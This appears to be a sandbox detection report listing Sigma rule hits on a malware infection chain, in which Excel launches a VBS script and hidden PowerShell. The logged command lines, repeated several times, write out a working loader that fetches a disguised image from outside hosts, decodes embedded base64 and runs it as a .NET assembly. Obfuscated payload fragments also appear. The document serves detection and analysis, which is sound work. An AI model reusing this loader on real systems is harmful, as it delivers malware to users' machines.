gTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTre
Sigma detected: Equation Editor Network Connection
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49168, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 91.92.244.96, SourceIsIpv6: false, SourcePort: 80
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\S
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTre
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3248, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , ProcessId: 3248, ProcessName: wscript.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , ProcessId: 3248, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTre
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 91.92.244.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3248, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49162, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 91.92.244.96, SourceIsIpv6: false, SourcePort: 80
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\S
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\S
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" , ProcessId: 3248, ProcessName: wscript.exe
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1892, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrD